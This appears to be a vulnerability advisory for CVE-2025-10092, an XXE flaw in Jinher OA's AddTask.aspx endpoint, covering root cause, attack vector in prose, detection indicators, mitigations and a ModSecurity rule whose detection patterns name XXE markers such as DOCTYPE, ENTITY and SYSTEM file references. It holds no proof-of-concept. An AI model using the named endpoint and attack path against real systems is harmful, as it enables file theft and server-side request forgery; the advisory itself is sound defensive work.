CVE-2025-10092: Jinher OA XXE Vulnerability

CVE-2025-10092 Overview

CVE-2025-10092 is an XML External Entity (XXE) vulnerability affecting Jinher OA up to version 1.2. The flaw resides in the XML Handler component, specifically in the /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add endpoint. Attackers can manipulate XML input to trigger external entity references, leading to information disclosure or server-side request forgery. The vulnerability is exploitable remotely over the network without authentication. Public disclosure of the exploit increases the likelihood of opportunistic attacks against exposed instances.

Critical Impact
Remote, unauthenticated attackers can abuse XML external entity processing in the AddTask.aspx endpoint to read local files or perform server-side request forgery against internal resources.

Affected Products

Jinher OA versions up to and including 1.2
Component: XML Handler in /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx
Vendor: Jinher

Discovery Timeline

2025-09-08 - CVE-2025-10092 published to NVD
2026-04-29 - Last updated in NVD database

Technical Details for CVE-2025-10092

Vulnerability Analysis

The vulnerability is classified under [CWE-611] Improper Restriction of XML External Entity Reference and [CWE-610] Externally Controlled Reference to a Resource in Another Sphere. Jinher OA accepts XML input through the AddTask.aspx endpoint without disabling external entity resolution in its XML parser. An attacker crafts a malicious XML payload containing a Document Type Definition (DTD) that references an external entity. When the application parses the input, the XML processor dereferences the entity and includes its contents in the parsing context. This behavior allows attackers to read arbitrary files accessible to the application service account or to issue outbound HTTP requests from the server.

Root Cause

The root cause is an insecurely configured XML parser within the project task management module. The parser does not disable DOCTYPE declarations or external entity resolution before processing untrusted XML. Web applications that use default .NET XML parsing APIs without setting XmlResolver to null or disabling DTD processing remain exposed to this class of attack.

Attack Vector

An unauthenticated attacker submits a crafted HTTP request to /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add containing XML with a malicious external entity definition. The server parses the input, resolves the entity, and returns or processes the referenced content. Attackers commonly exploit this pattern to read sensitive files such as web.config, application source files, or system configuration, and to probe internal network services. The exploit has been made public through external references including the GitHub issue tracker and VulDB submission 644868.

No verified proof-of-concept code is included here. Refer to the GitHub CVE Issue Discussion for technical details published by the reporter.

Detection Methods for CVE-2025-10092

Indicators of Compromise

HTTP POST or GET requests to /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx containing <!DOCTYPE or <!ENTITY declarations in the request body
Outbound network connections from the Jinher OA server to unexpected external hosts following XML requests
Web server access logs showing requests with Type=add parameter and XML content types from unauthenticated sources

Detection Strategies

Inspect web application firewall (WAF) logs for XML payloads containing DTD or SYSTEM entity references targeting the AddTask.aspx endpoint
Correlate inbound XML POST requests with subsequent outbound DNS or HTTP requests originating from the application server process
Monitor file access events on the Jinher OA host for unusual reads of configuration files by the IIS or .NET worker process

Monitoring Recommendations

Enable verbose logging on the IIS application pool serving Jinher OA and ship logs to a centralized SIEM
Deploy network detection signatures for XXE patterns such as SYSTEM "file://, SYSTEM "http://, and external DTD fetches
Alert on anomalous egress traffic from internal application servers to untrusted destinations

How to Mitigate CVE-2025-10092

Immediate Actions Required

Restrict network access to the Jinher OA /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx endpoint to trusted networks only
Deploy WAF rules that block XML payloads containing <!DOCTYPE or <!ENTITY declarations targeting Jinher OA endpoints
Audit web server and application logs for prior exploitation attempts against the affected endpoint

Patch Information

At the time of publication, no vendor advisory or official patch has been listed in the enriched CVE data. Organizations running Jinher OA up to version 1.2 should contact the vendor directly for remediation guidance and monitor the VulDB entry 323047 for updates.

Workarounds

Configure the XML parser to disable DTD processing and set the XmlResolver property to null in affected .NET components if source-level remediation is feasible
Place the Jinher OA application behind a reverse proxy that strips or rejects XML content containing external entity declarations
Apply egress filtering to prevent the application server from initiating outbound connections to arbitrary hosts, limiting SSRF impact

bash

# Example WAF rule pattern (ModSecurity) to block XXE payloads against the affected endpoint
SecRule REQUEST_URI "@contains /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx" \
  "chain,deny,status:403,id:1009201,msg:'Potential XXE against Jinher OA'"
  SecRule REQUEST_BODY "@rx (?i)(<!DOCTYPE|<!ENTITY|SYSTEM\s+[\"'])" "t:none"